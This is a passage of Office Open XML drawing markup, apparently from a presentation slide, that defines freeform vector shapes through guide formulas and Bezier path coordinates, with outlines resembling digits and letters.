                <a:gd name="T0" fmla="*/ 215 w 215"/>
                <a:gd name="T1" fmla="*/ 225 h 315"/>
                <a:gd name="T2" fmla="*/ 151 w 215"/>
                <a:gd name="T3" fmla="*/ 144 h 315"/>
                <a:gd name="T4" fmla="*/ 200 w 215"/>
                <a:gd name="T5" fmla="*/ 67 h 315"/>
                <a:gd name="T6" fmla="*/ 108 w 215"/>
                <a:gd name="T7" fmla="*/ 0 h 315"/>
                <a:gd name="T8" fmla="*/ 15 w 215"/>
                <a:gd name="T9" fmla="*/ 54 h 315"/>
                <a:gd name="T10" fmla="*/ 33 w 215"/>
                <a:gd name="T11" fmla="*/ 74 h 315"/>
                <a:gd name="T12" fmla="*/ 51 w 215"/>
                <a:gd name="T13" fmla="*/ 55 h 315"/>
                <a:gd name="T14" fmla="*/ 44 w 215"/>
                <a:gd name="T15" fmla="*/ 41 h 315"/>
                <a:gd name="T16" fmla="*/ 108 w 215"/>
                <a:gd name="T17" fmla="*/ 20 h 315"/>
                <a:gd name="T18" fmla="*/ 174 w 215"/>
                <a:gd name="T19" fmla="*/ 67 h 315"/>
                <a:gd name="T20" fmla="*/ 151 w 215"/>
                <a:gd name="T21" fmla="*/ 116 h 315"/>
                <a:gd name="T22" fmla="*/ 100 w 215"/>
                <a:gd name="T23" fmla="*/ 133 h 315"/>
                <a:gd name="T24" fmla="*/ 67 w 215"/>
                <a:gd name="T25" fmla="*/ 145 h 315"/>
                <a:gd name="T26" fmla="*/ 83 w 215"/>
                <a:gd name="T27" fmla="*/ 156 h 315"/>
                <a:gd name="T28" fmla="*/ 107 w 215"/>
                <a:gd name="T29" fmla="*/ 156 h 315"/>
                <a:gd name="T30" fmla="*/ 189 w 215"/>
                <a:gd name="T31" fmla="*/ 225 h 315"/>
                <a:gd name="T32" fmla="*/ 108 w 215"/>
                <a:gd name="T33" fmla="*/ 294 h 315"/>
                <a:gd name="T34" fmla="*/ 28 w 215"/>
                <a:gd name="T35" fmla="*/ 258 h 315"/>
                <a:gd name="T36" fmla="*/ 36 w 215"/>
                <a:gd name="T37" fmla="*/ 243 h 315"/>
                <a:gd name="T38" fmla="*/ 18 w 215"/>
                <a:gd name="T39" fmla="*/ 225 h 315"/>
                <a:gd name="T40" fmla="*/ 0 w 215"/>
                <a:gd name="T41" fmla="*/ 245 h 315"/>
                <a:gd name="T42" fmla="*/ 108 w 215"/>
                <a:gd name="T43" fmla="*/ 315 h 315"/>
                <a:gd name="T44" fmla="*/ 215 w 215"/>
                <a:gd name="T45" fmla="*/ 22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315">
                  <a:moveTo>
                    <a:pt x="215" y="225"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="191"/>
                    <a:pt x="192" y="162"/>
                    <a:pt x="151" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="121"/>
                    <a:pt x="200" y="93"/>
                    <a:pt x="200" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="31"/>
                    <a:pt x="164" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="21"/>
                    <a:pt x="15" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="68"/>
                    <a:pt x="25" y="74"/>
                    <a:pt x="33" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="74"/>
                    <a:pt x="51" y="67"/>
                    <a:pt x="51" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="50"/>
                    <a:pt x="49" y="46"/>
                    <a:pt x="44" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="21"/>
                    <a:pt x="103" y="20"/>
                    <a:pt x="108" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="20"/>
                    <a:pt x="174" y="42"/>
                    <a:pt x="174" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="84"/>
                    <a:pt x="166" y="104"/>
                    <a:pt x="151" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="131"/>
                    <a:pt x="120" y="132"/>
                    <a:pt x="100" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="135"/>
                    <a:pt x="67" y="135"/>
                    <a:pt x="67" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="156"/>
                    <a:pt x="77" y="156"/>
                    <a:pt x="83" y="156"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="156"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="156"/>
                    <a:pt x="189" y="193"/>
                    <a:pt x="189" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="259"/>
                    <a:pt x="159" y="294"/>
                    <a:pt x="108" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="294"/>
                    <a:pt x="45" y="287"/>
                    <a:pt x="28" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="253"/>
                    <a:pt x="36" y="251"/>
                    <a:pt x="36" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="233"/>
                    <a:pt x="28" y="225"/>
                    <a:pt x="18" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="225"/>
                    <a:pt x="0" y="232"/>
                    <a:pt x="0" y="245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="288"/>
                    <a:pt x="49" y="315"/>
                    <a:pt x="108" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="315"/>
                    <a:pt x="215" y="271"/>
                    <a:pt x="215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1" name="Freeform 1137">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534C1B60-5967-4BED-B108-B68BDF88116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4705350" y="1327150"/>
              <a:ext cx="82550" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 225 h 315"/>
                <a:gd name="T2" fmla="*/ 150 w 214"/>
                <a:gd name="T3" fmla="*/ 144 h 315"/>
                <a:gd name="T4" fmla="*/ 199 w 214"/>
                <a:gd name="T5" fmla="*/ 67 h 315"/>
                <a:gd name="T6" fmla="*/ 107 w 214"/>
                <a:gd name="T7" fmla="*/ 0 h 315"/>
                <a:gd name="T8" fmla="*/ 15 w 214"/>
                <a:gd name="T9" fmla="*/ 54 h 315"/>
                <a:gd name="T10" fmla="*/ 33 w 214"/>
                <a:gd name="T11" fmla="*/ 74 h 315"/>
                <a:gd name="T12" fmla="*/ 50 w 214"/>
                <a:gd name="T13" fmla="*/ 55 h 315"/>
                <a:gd name="T14" fmla="*/ 44 w 214"/>
                <a:gd name="T15" fmla="*/ 41 h 315"/>
                <a:gd name="T16" fmla="*/ 108 w 214"/>
                <a:gd name="T17" fmla="*/ 20 h 315"/>
                <a:gd name="T18" fmla="*/ 174 w 214"/>
                <a:gd name="T19" fmla="*/ 67 h 315"/>
                <a:gd name="T20" fmla="*/ 150 w 214"/>
                <a:gd name="T21" fmla="*/ 116 h 315"/>
                <a:gd name="T22" fmla="*/ 99 w 214"/>
                <a:gd name="T23" fmla="*/ 133 h 315"/>
                <a:gd name="T24" fmla="*/ 67 w 214"/>
                <a:gd name="T25" fmla="*/ 145 h 315"/>
                <a:gd name="T26" fmla="*/ 82 w 214"/>
                <a:gd name="T27" fmla="*/ 156 h 315"/>
                <a:gd name="T28" fmla="*/ 106 w 214"/>
                <a:gd name="T29" fmla="*/ 156 h 315"/>
                <a:gd name="T30" fmla="*/ 189 w 214"/>
                <a:gd name="T31" fmla="*/ 225 h 315"/>
                <a:gd name="T32" fmla="*/ 108 w 214"/>
                <a:gd name="T33" fmla="*/ 294 h 315"/>
                <a:gd name="T34" fmla="*/ 28 w 214"/>
                <a:gd name="T35" fmla="*/ 258 h 315"/>
                <a:gd name="T36" fmla="*/ 35 w 214"/>
                <a:gd name="T37" fmla="*/ 243 h 315"/>
                <a:gd name="T38" fmla="*/ 18 w 214"/>
                <a:gd name="T39" fmla="*/ 225 h 315"/>
                <a:gd name="T40" fmla="*/ 0 w 214"/>
                <a:gd name="T41" fmla="*/ 245 h 315"/>
                <a:gd name="T42" fmla="*/ 108 w 214"/>
                <a:gd name="T43" fmla="*/ 315 h 315"/>
                <a:gd name="T44" fmla="*/ 214 w 214"/>
                <a:gd name="T45" fmla="*/ 22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5">
                  <a:moveTo>
                    <a:pt x="214" y="225"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="191"/>
                    <a:pt x="191" y="162"/>
                    <a:pt x="150" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="121"/>
                    <a:pt x="199" y="93"/>
                    <a:pt x="199" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="163" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="21"/>
                    <a:pt x="15" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="68"/>
                    <a:pt x="25" y="74"/>
                    <a:pt x="33" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="74"/>
                    <a:pt x="50" y="67"/>
                    <a:pt x="50" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="50"/>
                    <a:pt x="48" y="46"/>
                    <a:pt x="44" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="21"/>
                    <a:pt x="103" y="20"/>
                    <a:pt x="108" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="20"/>
                    <a:pt x="174" y="42"/>
                    <a:pt x="174" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="84"/>
                    <a:pt x="166" y="104"/>
                    <a:pt x="150" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="131"/>
                    <a:pt x="119" y="132"/>
                    <a:pt x="99" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="135"/>
                    <a:pt x="67" y="135"/>
                    <a:pt x="67" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="156"/>
                    <a:pt x="76" y="156"/>
                    <a:pt x="82" y="156"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="156"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="156"/>
                    <a:pt x="189" y="193"/>
                    <a:pt x="189" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="259"/>
                    <a:pt x="158" y="294"/>
                    <a:pt x="108" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="294"/>
                    <a:pt x="44" y="287"/>
                    <a:pt x="28" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="253"/>
                    <a:pt x="35" y="251"/>
                    <a:pt x="35" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="233"/>
                    <a:pt x="28" y="225"/>
                    <a:pt x="18" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="225"/>
                    <a:pt x="0" y="232"/>
                    <a:pt x="0" y="245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="288"/>
                    <a:pt x="48" y="315"/>
                    <a:pt x="108" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="315"/>
                    <a:pt x="214" y="271"/>
                    <a:pt x="214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2" name="Freeform 1138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{066B9F20-E770-4708-8973-176FCFC841C1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4802187" y="1325563"/>
              <a:ext cx="88900" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 231 w 231"/>
                <a:gd name="T1" fmla="*/ 213 h 311"/>
                <a:gd name="T2" fmla="*/ 215 w 231"/>
                <a:gd name="T3" fmla="*/ 202 h 311"/>
                <a:gd name="T4" fmla="*/ 170 w 231"/>
                <a:gd name="T5" fmla="*/ 202 h 311"/>
                <a:gd name="T6" fmla="*/ 170 w 231"/>
                <a:gd name="T7" fmla="*/ 16 h 311"/>
                <a:gd name="T8" fmla="*/ 153 w 231"/>
                <a:gd name="T9" fmla="*/ 0 h 311"/>
                <a:gd name="T10" fmla="*/ 139 w 231"/>
                <a:gd name="T11" fmla="*/ 0 h 311"/>
                <a:gd name="T12" fmla="*/ 122 w 231"/>
                <a:gd name="T13" fmla="*/ 8 h 311"/>
                <a:gd name="T14" fmla="*/ 2 w 231"/>
                <a:gd name="T15" fmla="*/ 196 h 311"/>
                <a:gd name="T16" fmla="*/ 0 w 231"/>
                <a:gd name="T17" fmla="*/ 208 h 311"/>
                <a:gd name="T18" fmla="*/ 16 w 231"/>
                <a:gd name="T19" fmla="*/ 223 h 311"/>
                <a:gd name="T20" fmla="*/ 151 w 231"/>
                <a:gd name="T21" fmla="*/ 223 h 311"/>
                <a:gd name="T22" fmla="*/ 151 w 231"/>
                <a:gd name="T23" fmla="*/ 290 h 311"/>
                <a:gd name="T24" fmla="*/ 114 w 231"/>
                <a:gd name="T25" fmla="*/ 290 h 311"/>
                <a:gd name="T26" fmla="*/ 98 w 231"/>
                <a:gd name="T27" fmla="*/ 300 h 311"/>
                <a:gd name="T28" fmla="*/ 114 w 231"/>
                <a:gd name="T29" fmla="*/ 311 h 311"/>
                <a:gd name="T30" fmla="*/ 207 w 231"/>
                <a:gd name="T31" fmla="*/ 311 h 311"/>
                <a:gd name="T32" fmla="*/ 222 w 231"/>
                <a:gd name="T33" fmla="*/ 300 h 311"/>
                <a:gd name="T34" fmla="*/ 207 w 231"/>
                <a:gd name="T35" fmla="*/ 290 h 311"/>
                <a:gd name="T36" fmla="*/ 170 w 231"/>
                <a:gd name="T37" fmla="*/ 290 h 311"/>
                <a:gd name="T38" fmla="*/ 170 w 231"/>
                <a:gd name="T39" fmla="*/ 223 h 311"/>
                <a:gd name="T40" fmla="*/ 215 w 231"/>
                <a:gd name="T41" fmla="*/ 223 h 311"/>
                <a:gd name="T42" fmla="*/ 231 w 231"/>
                <a:gd name="T43" fmla="*/ 213 h 311"/>
                <a:gd name="T44" fmla="*/ 151 w 231"/>
                <a:gd name="T45" fmla="*/ 202 h 311"/>
                <a:gd name="T46" fmla="*/ 22 w 231"/>
                <a:gd name="T47" fmla="*/ 202 h 311"/>
                <a:gd name="T48" fmla="*/ 137 w 231"/>
                <a:gd name="T49" fmla="*/ 21 h 311"/>
                <a:gd name="T50" fmla="*/ 151 w 231"/>
                <a:gd name="T51" fmla="*/ 21 h 311"/>
                <a:gd name="T52" fmla="*/ 151 w 231"/>
                <a:gd name="T53" fmla="*/ 20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311">
                  <a:moveTo>
                    <a:pt x="231" y="213"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="202"/>
                    <a:pt x="221" y="202"/>
                    <a:pt x="215" y="202"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="3"/>
                    <a:pt x="167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2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4" y="223"/>
                    <a:pt x="16" y="223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="290"/>
                    <a:pt x="98" y="290"/>
                    <a:pt x="98" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="311"/>
                    <a:pt x="108" y="311"/>
                    <a:pt x="114" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207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3" y="290"/>
                    <a:pt x="207" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="223"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="223"/>
                    <a:pt x="231" y="223"/>
                    <a:pt x="231" y="213"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151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3" name="Freeform 1139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A65D50-D29F-4870-8387-6A8FFAED9A38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4902200" y="1325563"/>
              <a:ext cx="88900" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 230 w 230"/>
                <a:gd name="T1" fmla="*/ 213 h 311"/>
                <a:gd name="T2" fmla="*/ 215 w 230"/>
                <a:gd name="T3" fmla="*/ 202 h 311"/>
                <a:gd name="T4" fmla="*/ 169 w 230"/>
                <a:gd name="T5" fmla="*/ 202 h 311"/>
                <a:gd name="T6" fmla="*/ 169 w 230"/>
                <a:gd name="T7" fmla="*/ 16 h 311"/>
                <a:gd name="T8" fmla="*/ 153 w 230"/>
                <a:gd name="T9" fmla="*/ 0 h 311"/>
                <a:gd name="T10" fmla="*/ 139 w 230"/>
                <a:gd name="T11" fmla="*/ 0 h 311"/>
                <a:gd name="T12" fmla="*/ 121 w 230"/>
                <a:gd name="T13" fmla="*/ 8 h 311"/>
                <a:gd name="T14" fmla="*/ 2 w 230"/>
                <a:gd name="T15" fmla="*/ 196 h 311"/>
                <a:gd name="T16" fmla="*/ 0 w 230"/>
                <a:gd name="T17" fmla="*/ 208 h 311"/>
                <a:gd name="T18" fmla="*/ 15 w 230"/>
                <a:gd name="T19" fmla="*/ 223 h 311"/>
                <a:gd name="T20" fmla="*/ 150 w 230"/>
                <a:gd name="T21" fmla="*/ 223 h 311"/>
                <a:gd name="T22" fmla="*/ 150 w 230"/>
                <a:gd name="T23" fmla="*/ 290 h 311"/>
                <a:gd name="T24" fmla="*/ 113 w 230"/>
                <a:gd name="T25" fmla="*/ 290 h 311"/>
                <a:gd name="T26" fmla="*/ 98 w 230"/>
                <a:gd name="T27" fmla="*/ 300 h 311"/>
                <a:gd name="T28" fmla="*/ 113 w 230"/>
                <a:gd name="T29" fmla="*/ 311 h 311"/>
                <a:gd name="T30" fmla="*/ 206 w 230"/>
                <a:gd name="T31" fmla="*/ 311 h 311"/>
                <a:gd name="T32" fmla="*/ 222 w 230"/>
                <a:gd name="T33" fmla="*/ 300 h 311"/>
                <a:gd name="T34" fmla="*/ 206 w 230"/>
                <a:gd name="T35" fmla="*/ 290 h 311"/>
                <a:gd name="T36" fmla="*/ 169 w 230"/>
                <a:gd name="T37" fmla="*/ 290 h 311"/>
                <a:gd name="T38" fmla="*/ 169 w 230"/>
                <a:gd name="T39" fmla="*/ 223 h 311"/>
                <a:gd name="T40" fmla="*/ 215 w 230"/>
                <a:gd name="T41" fmla="*/ 223 h 311"/>
                <a:gd name="T42" fmla="*/ 230 w 230"/>
                <a:gd name="T43" fmla="*/ 213 h 311"/>
                <a:gd name="T44" fmla="*/ 150 w 230"/>
                <a:gd name="T45" fmla="*/ 202 h 311"/>
                <a:gd name="T46" fmla="*/ 22 w 230"/>
                <a:gd name="T47" fmla="*/ 202 h 311"/>
                <a:gd name="T48" fmla="*/ 137 w 230"/>
                <a:gd name="T49" fmla="*/ 21 h 311"/>
                <a:gd name="T50" fmla="*/ 150 w 230"/>
                <a:gd name="T51" fmla="*/ 21 h 311"/>
                <a:gd name="T52" fmla="*/ 150 w 230"/>
                <a:gd name="T53" fmla="*/ 20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1">
                  <a:moveTo>
                    <a:pt x="230" y="213"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="202"/>
                    <a:pt x="220" y="202"/>
                    <a:pt x="215" y="202"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="169" y="202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1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3" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="290"/>
                    <a:pt x="98" y="290"/>
                    <a:pt x="98" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="311"/>
                    <a:pt x="108" y="311"/>
                    <a:pt x="113" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206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2" y="290"/>
                    <a:pt x="206" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="169" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215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0" y="202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150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4" name="Freeform 1140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EECFA78-CB8D-47BB-AA5D-BCEAFB76D672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1498600" y="1560513"/>
              <a:ext cx="85725" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 224 w 224"/>
                <a:gd name="T1" fmla="*/ 89 h 305"/>
                <a:gd name="T2" fmla="*/ 132 w 224"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 16 w 224"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 224"/>
                <a:gd name="T7" fmla="*/ 10 h 305"/>
                <a:gd name="T8" fmla="*/ 16 w 224"/>
                <a:gd name="T9" fmla="*/ 21 h 305"/>
                <a:gd name="T10" fmla="*/ 37 w 224"/>
                <a:gd name="T11" fmla="*/ 21 h 305"/>
                <a:gd name="T12" fmla="*/ 37 w 224"/>
                <a:gd name="T13" fmla="*/ 284 h 305"/>
                <a:gd name="T14" fmla="*/ 16 w 224"/>
                <a:gd name="T15" fmla="*/ 284 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 224"/>
                <a:gd name="T17" fmla="*/ 294 h 305"/>
                <a:gd name="T18" fmla="*/ 16 w 224"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 83 w 224"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 99 w 224"/>
                <a:gd name="T23" fmla="*/ 294 h 305"/>
                <a:gd name="T24" fmla="*/ 83 w 224"/>
                <a:gd name="T25" fmla="*/ 284 h 305"/>
                <a:gd name="T26" fmla="*/ 62 w 224"/>
                <a:gd name="T27" fmla="*/ 284 h 305"/>
                <a:gd name="T28" fmla="*/ 62 w 224"/>
                <a:gd name="T29" fmla="*/ 178 h 305"/>
                <a:gd name="T30" fmla="*/ 132 w 224"/>
                <a:gd name="T31" fmla="*/ 178 h 305"/>
                <a:gd name="T32" fmla="*/ 224 w 224"/>
                <a:gd name="T33" fmla="*/ 89 h 305"/>
                <a:gd name="T34" fmla="*/ 199 w 224"/>
                <a:gd name="T35" fmla="*/ 89 h 305"/>
                <a:gd name="T36" fmla="*/ 122 w 224"/>
                <a:gd name="T37" fmla="*/ 157 h 305"/>
                <a:gd name="T38" fmla="*/ 62 w 224"/>
                <a:gd name="T39" fmla="*/ 157 h 305"/>
                <a:gd name="T40" fmla="*/ 62 w 224"/>
                <a:gd name="T41" fmla="*/ 21 h 305"/>
                <a:gd name="T42" fmla="*/ 122 w 224"/>
                <a:gd name="T43" fmla="*/ 21 h 305"/>
                <a:gd name="T44" fmla="*/ 199 w 224"/>
                <a:gd name="T45" fmla="*/ 8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305">
                  <a:moveTo>
                    <a:pt x="224" y="89"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="44"/>
                    <a:pt x="188" y="0"/>
                    <a:pt x="132" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="11" y="21"/>
                    <a:pt x="16" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="37" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37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1" y="305"/>
                    <a:pt x="16" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="305"/>
                    <a:pt x="99" y="305"/>
                    <a:pt x="99" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="284"/>
                    <a:pt x="89" y="284"/>
                    <a:pt x="83" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="62" y="284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132" y="178"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="178"/>
                    <a:pt x="224" y="135"/>
                    <a:pt x="224" y="89"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="199" y="89"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="119"/>
                    <a:pt x="175" y="157"/>
                    <a:pt x="122" y="157"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="62" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="21"/>
                    <a:pt x="199" y="60"/>
                    <a:pt x="199" y="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5" name="Freeform 1141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406474E5-1610-45AC-BB2A-07AAF2623AC0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604962" y="1560513"/>
              <a:ext cx="76200" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 201"/>
                <a:gd name="T1" fmla="*/ 294 h 305"/>
                <a:gd name="T2" fmla="*/ 186 w 201"/>
                <a:gd name="T3" fmla="*/ 284 h 305"/>
                <a:gd name="T4" fmla="*/ 113 w 201"/>
                <a:gd name="T5" fmla="*/ 284 h 305"/>
                <a:gd name="T6" fmla="*/ 113 w 201"/>
                <a:gd name="T7" fmla="*/ 16 h 305"/>
                <a:gd name="T8" fmla="*/ 98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6 w 201"/>
                <a:gd name="T15" fmla="*/ 21 h 305"/>
                <a:gd name="T16" fmla="*/ 88 w 201"/>
                <a:gd name="T17" fmla="*/ 21 h 305"/>
                <a:gd name="T18" fmla="*/ 88 w 201"/>
                <a:gd name="T19" fmla="*/ 284 h 305"/>
                <a:gd name="T20" fmla="*/ 16 w 201"/>
                <a:gd name="T21" fmla="*/ 284 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 201"/>
                <a:gd name="T23" fmla="*/ 294 h 305"/>
                <a:gd name="T24" fmla="*/ 16 w 201"/>
